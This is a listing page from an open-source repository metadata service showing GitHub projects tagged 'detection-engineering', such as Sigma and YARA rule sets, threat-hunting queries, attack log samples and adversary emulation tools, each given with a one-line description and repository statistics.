An open API service providing repository metadata for many open source software ecosystems.

Topic: "detection-engineering"

sbousseaden/EVTX-ATTACK-SAMPLES

Windows Events Attack Samples

Language: HTML - Size: 6.05 MB - Last synced at: 4 months ago - Pushed at: over 2 years ago - Stars: 2,322 - Forks: 413

DataDog/stratus-red-team

:cloud: :zap: Granular, Actionable Adversary Emulation for the Cloud

Language: Go - Size: 3.8 MB - Last synced at: about 1 month ago - Pushed at: about 1 month ago - Stars: 2,043 - Forks: 246

mikeroyal/Digital-Forensics-Guide

Digital Forensics Guide. Learn all about Digital Forensics, Computer Forensics, Mobile device Forensics, Network Forensics, and Database Forensics.

Language: Python - Size: 367 KB - Last synced at: 2 months ago - Pushed at: over 1 year ago - Stars: 1,897 - Forks: 223

matanolabs/matano

Open source security data lake for threat hunting, detection & response, and cybersecurity analytics at petabyte scale on AWS

Language: Rust - Size: 11 MB - Last synced at: about 2 months ago - Pushed at: 7 months ago - Stars: 1,559 - Forks: 111

splunk/security_content

Splunk Security Content

Language: Python - Size: 291 MB - Last synced at: 2 days ago - Pushed at: 2 days ago - Stars: 1,458 - Forks: 410

BushidoUK/Ransomware-Tool-Matrix

A resource containing all the tools each ransomware gangs uses

Size: 692 KB - Last synced at: 19 days ago - Pushed at: 19 days ago - Stars: 1,065 - Forks: 117

mthcht/awesome-lists

Awesome Security lists for SOC/CERT/CTI

Language: YARA - Size: 18.7 GB - Last synced at: about 12 hours ago - Pushed at: about 12 hours ago - Stars: 1,050 - Forks: 135

infosecB/awesome-detection-engineering

Detection Engineering is a tactical function of a cybersecurity defense program that involves the design, implementation, and operation of detective controls with the goal of proactively identifying malicious or unauthorized activity before it negatively impacts an individual or an organization.

Size: 130 KB - Last synced at: 13 days ago - Pushed at: 26 days ago - Stars: 1,011 - Forks: 92

mikeroyal/Open-Source-Security-Guide

Open Source Security Guide. Learn all about Security Standards (FIPS, CIS, FedRAMP, FISMA, etc.), Frameworks, Threat Models, Encryption, and Benchmarks.

Language: Go - Size: 655 KB - Last synced at: 2 months ago - Pushed at: over 1 year ago - Stars: 965 - Forks: 86

mvelazc0/PurpleSharp

PurpleSharp is a C# adversary simulation tool that executes adversary techniques with the purpose of generating attack telemetry in monitored Windows environments

Language: C# - Size: 859 KB - Last synced at: 15 days ago - Pushed at: 7 months ago - Stars: 813 - Forks: 111

Cyb3r-Monk/Threat-Hunting-and-Detection

Repository for threat hunting and detection queries, etc. for Defender for Endpoint and Microsoft Sentinel in KQL(Kusto Query Language).

Language: Jupyter Notebook - Size: 407 KB - Last synced at: about 2 months ago - Pushed at: 4 months ago - Stars: 731 - Forks: 105

runreveal/pql

Pipelined Query Language

Language: Go - Size: 215 KB - Last synced at: 4 months ago - Pushed at: 7 months ago - Stars: 649 - Forks: 25

mthcht/ThreatHunting-Keywords

Awesome list of keywords and artifacts for Threat Hunting sessions

Language: PowerShell - Size: 209 MB - Last synced at: 12 days ago - Pushed at: 23 days ago - Stars: 585 - Forks: 70

sbousseaden/Slides

Misc Threat Hunting Resources

Size: 13.6 MB - Last synced at: over 1 year ago - Pushed at: over 2 years ago - Stars: 359 - Forks: 61

nianticlabs/venator

A flexible threat detection platform that simplifies rule management and deployment using K8s CronJob and Helm, but can also run standalone or with other job schedulers like Nomad.

Language: Go - Size: 356 KB - Last synced at: 8 months ago - Pushed at: 10 months ago - Stars: 353 - Forks: 19

DataDog/threatest

Threatest is a CLI and Go framework for end-to-end testing threat detection rules.

Language: Go - Size: 382 KB - Last synced at: 5 days ago - Pushed at: 3 months ago - Stars: 331 - Forks: 24

DataDog/grimoire

Generate datasets of cloud audit logs for common attacks

Language: Go - Size: 1.11 MB - Last synced at: 8 days ago - Pushed at: 12 months ago - Stars: 216 - Forks: 20

lolc2/lolc2.github.io

lolC2 is a collection of C2 frameworks that leverage legitimate services to evade detection

Language: HTML - Size: 37.5 MB - Last synced at: about 2 months ago - Pushed at: about 2 months ago - Stars: 209 - Forks: 18

mthcht/Purpleteam

Purpleteam scripts simulation & Detection - trigger events for SOC detections

Language: PowerShell - Size: 39.5 MB - Last synced at: about 1 month ago - Pushed at: 7 months ago - Stars: 185 - Forks: 20

nasbench/SIGMA-Resources

Resources To Learn And Understand SIGMA Rules

Size: 13.7 KB - Last synced at: 5 days ago - Pushed at: over 2 years ago - Stars: 179 - Forks: 13

0xrawsec/gene

Signature engine for all your logs

Language: Go - Size: 5.64 MB - Last synced at: about 1 month ago - Pushed at: over 1 year ago - Stars: 170 - Forks: 19

3CORESec/SIEGMA

SIEGMA - Transform Sigma rules into SIEM consumables

Language: Python - Size: 1.01 MB - Last synced at: 5 months ago - Pushed at: 5 months ago - Stars: 149 - Forks: 23

lawndoc/AdvancedHuntingQueries

Microsoft 365 Advanced Hunting Queries with hotlinks that plug the query right into your tenant.

Size: 327 KB - Last synced at: about 1 month ago - Pushed at: about 1 month ago - Stars: 124 - Forks: 17

mthcht/ThreatHunting-Keywords-yara-rules

yara detection rules for hunting with the threathunting-keywords project

Language: YARA - Size: 86.4 MB - Last synced at: 12 days ago - Pushed at: 3 months ago - Stars: 124 - Forks: 18

rfackroyd/detection-engineering-starter-pack

A starter pack of resources to help you get started in Detection Engineering.

Size: 18.6 KB - Last synced at: 18 days ago - Pushed at: 18 days ago - Stars: 110 - Forks: 16

mvelazc0/attack2jira

attack2jira automates the process of standing up a Jira environment that can be used to track and measure ATT&CK coverage

Language: Python - Size: 50.8 KB - Last synced at: over 1 year ago - Pushed at: over 2 years ago - Stars: 108 - Forks: 31

st0pp3r/awesome-detection-engineer

Online resources related to Detection Engineering. Detection rules, detection logic, attack samples, detection tests and emulation tools, logging configuration and best practices, event log references, resources, labs, data manipulation online tools, blogs, newsletters, good reads, books, trainings, podcasts, videos and twitter/x accounts.

Language: HTML - Size: 512 KB - Last synced at: 6 days ago - Pushed at: 14 days ago - Stars: 104 - Forks: 14

anvilogic-forge/armory

Anvilogic Forge

Size: 2.33 MB - Last synced at: 22 days ago - Pushed at: 23 days ago - Stars: 104 - Forks: 7

ControlCompass/ControlCompass.github.io

Pointing cybersecurity teams to thousands of detection rules and offensive security tests aligned with common attacker techniques

Language: JavaScript - Size: 2.78 MB - Last synced at: over 2 years ago - Pushed at: almost 3 years ago - Stars: 91 - Forks: 20

bradleyjkemp/sigma-go

A Go implementation and parser for Sigma rules.

Language: Go - Size: 357 KB - Last synced at: 2 months ago - Pushed at: 2 months ago - Stars: 89 - Forks: 18

AttackIQ/SigmAIQ

A pySigma wrapper and langchain toolkit for automatic rule creation/translation

Language: Python - Size: 1.49 MB - Last synced at: 2 months ago - Pushed at: 2 months ago - Stars: 81 - Forks: 12

0xAnalyst/DefenderATPQueries

Hunting Queries for Defender ATP

Size: 349 KB - Last synced at: 4 months ago - Pushed at: 4 months ago - Stars: 81 - Forks: 8

adrianlois/DFIR-Detection-Engineering

Digital Forensics Incident Response and Detection engineering: Análisis forense de artefactos comunes y no tan comunes. Técnicas anti-forense y detección de técnicas utilizadas por actores maliciosos para la evasión de sistemas de protección y monitorización.

Size: 1.29 MB - Last synced at: about 1 month ago - Pushed at: about 1 month ago - Stars: 80 - Forks: 12

AlbinoGazelle/esxi-testing-toolkit

🧰 ESXi Testing Tookit is a command-line utility designed to help security teams test ESXi detections.

Language: Python - Size: 13 MB - Last synced at: about 1 month ago - Pushed at: 3 months ago - Stars: 76 - Forks: 10

krdmnbrk/AttackRuleMap

Mapping of open-source detection rules and atomic tests.

Size: 1.65 MB - Last synced at: 6 months ago - Pushed at: 6 months ago - Stars: 72 - Forks: 7

mannyfred/MentalTi

Mentally ill EtwTi parser

Language: C++ - Size: 248 KB - Last synced at: 6 days ago - Pushed at: 6 days ago - Stars: 63 - Forks: 3

reversinglabs/reversinglabs-siem-rules

A collection of various SIEM rules relating to malware family groups.

Language: YARA - Size: 164 KB - Last synced at: about 1 year ago - Pushed at: about 1 year ago - Stars: 59 - Forks: 6

infosecB/detection-as-code

An example of how to deploy a Detection as Code pipeline using Sigma Rules, Sigmac, Gitlab CI, and Splunk.

Language: Python - Size: 33.2 KB - Last synced at: 3 months ago - Pushed at: over 3 years ago - Stars: 55 - Forks: 14

mthcht/ThreatHunting-Keywords-sigma-rules

Sigma detection rules for hunting with the threathunting-keywords project

Language: Python - Size: 176 MB - Last synced at: 5 months ago - Pushed at: 5 months ago - Stars: 54 - Forks: 7

3CORESec/Automata

Automatic detection engineering technical state compliance

Language: Python - Size: 3.24 MB - Last synced at: about 1 year ago - Pushed at: about 1 year ago - Stars: 48 - Forks: 11

west-wind/Threat-Hunting-With-Splunk

Awesome Splunk SPL hunt queries that can be used to detect the latest vulnerability exploitation attempts & subsequent compromise

Size: 53.7 KB - Last synced at: about 1 year ago - Pushed at: about 1 year ago - Stars: 48 - Forks: 6

M3NIX/sigmaio 📦

simple webapp for converting sigma rules into siem queries using the pySigma library

Language: HTML - Size: 53.7 KB - Last synced at: almost 2 years ago - Pushed at: almost 2 years ago - Stars: 43 - Forks: 3

center-for-threat-informed-defense/summiting-the-pyramid

Summiting the Pyramid is a research project focused on engineering cyber analytics to make adversary evasion more difficult. The research includes a scoring model, methodology, and worked examples.

Language: Makefile - Size: 22 MB - Last synced at: about 2 months ago - Pushed at: 2 months ago - Stars: 41 - Forks: 3

certeu/droid

A pySigma wrapper to manage detection rules.

Language: Python - Size: 259 KB - Last synced at: 19 days ago - Pushed at: 19 days ago - Stars: 40 - Forks: 4

nasbench/Eventlog_Compendium

The Eventlog Compendium is the go-to resource for understanding Windows Event Logs.

Language: Python - Size: 149 MB - Last synced at: 3 months ago - Pushed at: 3 months ago - Stars: 37 - Forks: 3

krdmnbrk/atomicgen.io

A simple tool designed to create Atomic Red Team tests with ease.

Language: JavaScript - Size: 722 KB - Last synced at: 5 months ago - Pushed at: 5 months ago - Stars: 37 - Forks: 4

LogCraftIO/logcraft-cli

Detection-as-Code CI/CD pipeline for modern security operations (SIEM, EDR, XDR, ...)

Language: Rust - Size: 592 KB - Last synced at: 3 months ago - Pushed at: 3 months ago - Stars: 21 - Forks: 1

center-for-threat-informed-defense/m3tid

The Measure, Maximize, and Mature Threat-Informed Defense (M3TID) project defines what Threat-Informed Defense (TID) is and the key activities associated with its practice.

Language: Makefile - Size: 5.69 MB - Last synced at: about 1 month ago - Pushed at: about 1 month ago - Stars: 16 - Forks: 3

Digital-Defense-Institute/lc-detectionforge

A specialized environment for crafting, validating, and testing LimaCharlie detection rules

Language: Vue - Size: 493 KB - Last synced at: 1 day ago - Pushed at: 5 days ago - Stars: 14 - Forks: 2

BenjiTrapp/aws-threat-hunting

Short deep dive into Threat Hunting on AWS

Language: Jupyter Notebook - Size: 234 MB - Last synced at: 6 days ago - Pushed at: almost 2 years ago - Stars: 13 - Forks: 2

panther-labs/pypanther-starter-kit

A Python-native Detection as Code Framework

Language: Python - Size: 312 KB - Last synced at: 3 months ago - Pushed at: 3 months ago - Stars: 12 - Forks: 6

panther-labs/pypanther

A Pythonic Detection Rules Framework

Language: Python - Size: 3.2 MB - Last synced at: 5 days ago - Pushed at: 5 days ago - Stars: 11 - Forks: 2

TracecatHQ/hunts

🐻‍❄️ 🏹 Threat hunting with Polars and flaws.cloud AWS CloudTrail datasets.

Language: Jupyter Notebook - Size: 69.3 KB - Last synced at: about 1 month ago - Pushed at: about 1 year ago - Stars: 11 - Forks: 1

erickatwork/threat-detection-engineering-reference

Resource for all things threat detection

Size: 3.98 MB - Last synced at: 6 months ago - Pushed at: 6 months ago - Stars: 9 - Forks: 0

H3llKa1ser/SOC-Assistant-Guide

A Security Operations playbook to assist blue teamers from day-to-day tasks to Digital Forensics and Incident Response (DFIR) activities.

Size: 182 KB - Last synced at: 7 months ago - Pushed at: 7 months ago - Stars: 9 - Forks: 2

deadbits/trs

🔭 Threat report analysis via LLM and Vector DB

Language: Python - Size: 1.29 MB - Last synced at: 3 months ago - Pushed at: over 1 year ago - Stars: 9 - Forks: 1

qasimqlf/StepbyStep_CyberSecurity

A Step by Step Guide for Cyber Security Beginners to Jump into the right path

Size: 41.1 MB - Last synced at: 6 months ago - Pushed at: over 2 years ago - Stars: 8 - Forks: 11

oliviagallucci/og-apple-security

my notes on Apple security 💻🍏

Language: Objective-C - Size: 41.8 MB - Last synced at: about 10 hours ago - Pushed at: about 13 hours ago - Stars: 7 - Forks: 0

muchdogesec/txt2detection

A command line tool that takes a txt file containing threat intelligence and turns it into a detection rule.

Language: Python - Size: 380 KB - Last synced at: 12 days ago - Pushed at: 12 days ago - Stars: 7 - Forks: 1

jacobstickney/ThreatActorProcedures-MITRE-ATTACK

A collection of specific commands used by threat actors, detailing their procedural implementations of tactics and techniques from the MITRE ATT&CK framework.

Size: 126 KB - Last synced at: 3 months ago - Pushed at: 6 months ago - Stars: 7 - Forks: 2

MrM8BRH/Defensive-Security-Hub

A curated collection of essential resources, tools, and references for Security Operations Center (SOC) analysts.

Size: 3.85 MB - Last synced at: 1 day ago - Pushed at: 1 day ago - Stars: 6 - Forks: 1

circulatedev/circulate

The Open Source Threat Intelligence Knowledge Graph for identifying and correlating TTPs, IOCs, and insights relevant to your organization.

Language: HCL - Size: 2.1 MB - Last synced at: about 2 years ago - Pushed at: over 2 years ago - Stars: 6 - Forks: 1

CodeByHarri/Sigma2KQL

Sigma Queries turned into KQL for Defender using pysigma

Size: 753 KB - Last synced at: about 1 year ago - Pushed at: about 1 year ago - Stars: 5 - Forks: 2

JakePeralta7/CyberSecurity

Research, Rules, Books, Tools and more basic stuff you can get anywhere

Language: Python - Size: 439 MB - Last synced at: over 2 years ago - Pushed at: over 2 years ago - Stars: 5 - Forks: 0

crazyeights225/WinEventLogExplorer

Capture all events across all logs produced during the running of a particular exploit/script. Search and filter events

Language: PowerShell - Size: 1.26 MB - Last synced at: almost 2 years ago - Pushed at: almost 4 years ago - Stars: 5 - Forks: 0

Arizona-Cyber-Threat-Response-Alliance/rmm-detection

A repository for tools and resources for detecting and managing RMM in enterprise environments.

Size: 640 KB - Last synced at: 3 months ago - Pushed at: 3 months ago - Stars: 4 - Forks: 2

cyberphor/deathlab

My Detection Engineering and Threat Hunting (DEATH) Lab.

Language: HCL - Size: 229 KB - Last synced at: about 1 year ago - Pushed at: about 1 year ago - Stars: 4 - Forks: 0

databricks-industry-solutions/cybersecurity-ml-tutorials

Machine learning notebooks using cybersecurity data

Language: Python - Size: 43 KB - Last synced at: about 1 year ago - Pushed at: about 1 year ago - Stars: 4 - Forks: 0

infosecB/generate_attacknav_layer

A Python CLI utility for quickly converting a list or text file of MITRE ATT&CK technique IDs to a MITRE ATT&CK Navigator layer .JSON file.

Language: Python - Size: 33 MB - Last synced at: about 2 months ago - Pushed at: over 3 years ago - Stars: 4 - Forks: 0

darkquasar/purplerepo

🛡️⚔️ Curated GitHub repos for Defensive & Offensive Cyber Tradecraft

Language: TypeScript - Size: 17.4 MB - Last synced at: 4 days ago - Pushed at: 4 days ago - Stars: 3 - Forks: 2

runreveal/runreveal-docs

The code powering RunReveal's documentation.

Language: MDX - Size: 28.1 MB - Last synced at: 7 days ago - Pushed at: 7 days ago - Stars: 3 - Forks: 3

whichbuffer/Threat-Detection-Rules

Threat Detection Repository - YARA / SIGMA rules

Language: YARA - Size: 104 KB - Last synced at: over 1 year ago - Pushed at: over 1 year ago - Stars: 3 - Forks: 0

2O0K/Sentinel-Rules

Updated Sigma2KQL script written by @CodeByHarri + Generating Analytics & Hunting Rules ready for Sentinel Deployment

Language: Python - Size: 6.79 MB - Last synced at: 2 months ago - Pushed at: 11 months ago - Stars: 2 - Forks: 0

LogCraftIO/logcraft-cli-plugins

Plugins for LogCraft CLI

Language: Rust - Size: 120 KB - Last synced at: about 1 year ago - Pushed at: about 1 year ago - Stars: 2 - Forks: 0

rgi-group/Cloud-DART

Cloud-DART is a comprehensive repository that provides Standard Operating Procedures (SOPs), Jupyter Notebooks, and code blocks for detection and response in cloud environments. This repository is designed to assist security professionals in automating and enhancing their cloud security posture.

Language: Python - Size: 1.15 MB - Last synced at: over 1 year ago - Pushed at: over 1 year ago - Stars: 2 - Forks: 0

Ben4FH/Adaz-Sentinel Fork of christophetd/Adaz

Microsoft Sentinel fork of Adaz :wrench: Deploy customizable Active Directory labs in Azure - automatically.

Language: HCL - Size: 4.16 MB - Last synced at: over 2 years ago - Pushed at: almost 3 years ago - Stars: 2 - Forks: 0

3CORESec/dtio-kb

Technical resources and knowledge base for dtection.io

Language: Shell - Size: 22.8 MB - Last synced at: over 2 years ago - Pushed at: about 4 years ago - Stars: 2 - Forks: 0

muchdogesec/siemrules

An API that takes a txt file containing threat intelligence and turns it into a detection rule.

Language: Python - Size: 473 KB - Last synced at: 1 day ago - Pushed at: 1 day ago - Stars: 1 - Forks: 1

penxpkj/Defensive-Security-Hub

# Defensive Security Hub A curated collection of essential resources, tools, and references for Security Operations Center (SOC) analysts. This repository aims to support your security efforts and enhance your skills. 🌐🔒

Size: 25.4 KB - Last synced at: 12 days ago - Pushed at: 12 days ago - Stars: 1 - Forks: 0

certeu/moriohub

No need to re-invent the observability wheel. What you need is perhaps already on Moriohub!

Language: JavaScript - Size: 150 KB - Last synced at: about 2 months ago - Pushed at: about 2 months ago - Stars: 1 - Forks: 2

pop-ecx/sigma-ls

A minimal language server to help in writing sigma rules

Language: Python - Size: 31.2 MB - Last synced at: about 2 months ago - Pushed at: about 2 months ago - Stars: 1 - Forks: 0

Aamir-Muhammad/CrowdStrike-Queries

CrowdStrike Falcon Advanced Threat Hunting Queries

Size: 35.2 KB - Last synced at: 25 days ago - Pushed at: 3 months ago - Stars: 1 - Forks: 0

infosecB/Rulehound

An index of publicly available and open-source threat detection rulesets.

Size: 286 KB - Last synced at: 4 months ago - Pushed at: 4 months ago - Stars: 1 - Forks: 0

muchdogesec/awesome_detection_rules

A curated list of Awesome Detection Rules

Size: 5.86 KB - Last synced at: 8 days ago - Pushed at: 8 months ago - Stars: 1 - Forks: 1

lukejjh/MicrosoftSentinel

An assortment of resources pertaining to Defender XDR and Microsoft Sentinel, such as KQL hunting queries and workbooks.

Size: 3.02 MB - Last synced at: 8 months ago - Pushed at: 8 months ago - Stars: 1 - Forks: 0

fish-not-phish/cb-inspector

De-facto parent tenant for Carbon Black Enterprise EDR

Language: Python - Size: 72.3 KB - Last synced at: almost 2 years ago - Pushed at: almost 2 years ago - Stars: 1 - Forks: 0

TTLNinja/madlibs

DNS sourced Mad Lib Game

Language: HTML - Size: 179 KB - Last synced at: 4 days ago - Pushed at: 4 days ago - Stars: 0 - Forks: 0

integrateddefense/lab_infra

Infrastructure as Code for the home lab

Size: 258 KB - Last synced at: 4 days ago - Pushed at: 4 days ago - Stars: 0 - Forks: 0

ndr-repo/awesome-threat-hunting

Size: 45.9 KB - Last synced at: 7 days ago - Pushed at: 7 days ago - Stars: 0 - Forks: 0

Chintan2604/forensic

Conteneur Docker tout-en-un pour l'investigation numérique, incluant des outils préinstallés pour l'analyse forensique de disques, mémoire, malwares et appareils mobiles.

Language: Dockerfile - Size: 11.7 KB - Last synced at: 8 days ago - Pushed at: 8 days ago - Stars: 0 - Forks: 0

Gamlive11/og-apple-security

Explore notes on Apple security, focusing on macOS detection engineering and threat hunting. Enhance your skills with resources and practical insights. 🐙🍏

Size: 1.95 KB - Last synced at: 12 days ago - Pushed at: 12 days ago - Stars: 0 - Forks: 0

Guilh6924/grimoire

Create professional EPUBs effortlessly with Grimoire. Perfect for authors, bloggers, and educators. Start writing today! 🚀📚

Language: JavaScript - Size: 117 KB - Last synced at: 29 days ago - Pushed at: 29 days ago - Stars: 0 - Forks: 0

texasbe2trill/sigma-linux-backend

A lightweight, standalone implementation for Sigma rule evaluation when the full pySigma backend ecosystem isn't available or when you need a simple, dependency-light solution.

Language: Python - Size: 46.9 KB - Last synced at: 7 days ago - Pushed at: about 1 month ago - Stars: 0 - Forks: 0

wai-htet/Threat-Detection-Pipeline

A modular, containerized cybersecurity pipeline that simulates real-time threat detection, centralized logging (SIEM), and automated incident response (SOAR). Built for scalability, automation, and real-world detection engineering.

Language: Python - Size: 3.91 KB - Last synced at: 2 months ago - Pushed at: 2 months ago - Stars: 0 - Forks: 0

mf1d3l/HayabusaToWinEventLog

Hayabusa to the SIEM made easy

Language: PowerShell - Size: 531 KB - Last synced at: 2 months ago - Pushed at: 2 months ago - Stars: 0 - Forks: 0

rhejos/soc-detection-lab

Detection engineering lab using Splunk, Sigma, and Windows logs — mapped to MITRE ATT&CK

Size: 1.95 KB - Last synced at: 2 months ago - Pushed at: 3 months ago - Stars: 0 - Forks: 0

armandoariasinfosec/splunk-brute-force-detection-lab

Detect and alert brute-force RDP attacks using Splunk, Windows logs, and a simulated Kali Linux attacker. Home lab project.

Size: 7.81 KB - Last synced at: 3 months ago - Pushed at: 3 months ago - Stars: 0 - Forks: 0

Samriddhi5/incident-response-playbooks

Incident response playbooks and templates for real-world security scenarios

Size: 0 Bytes - Last synced at: 4 months ago - Pushed at: 4 months ago - Stars: 0 - Forks: 0

SpoofIMEI/LiteCanary

Self hostable canary alerts

Language: Go - Size: 46.9 KB - Last synced at: about 2 months ago - Pushed at: 5 months ago - Stars: 0 - Forks: 0

xpinux/Project-SABER

Project-SABER: A repository of KQL queries and parsers for threat hunting, threat detection, and log parsing in Microsoft Sentinel & Microsoft XDR (formerly Microsoft 365 Defender)

Size: 58.6 KB - Last synced at: 5 months ago - Pushed at: 5 months ago - Stars: 0 - Forks: 0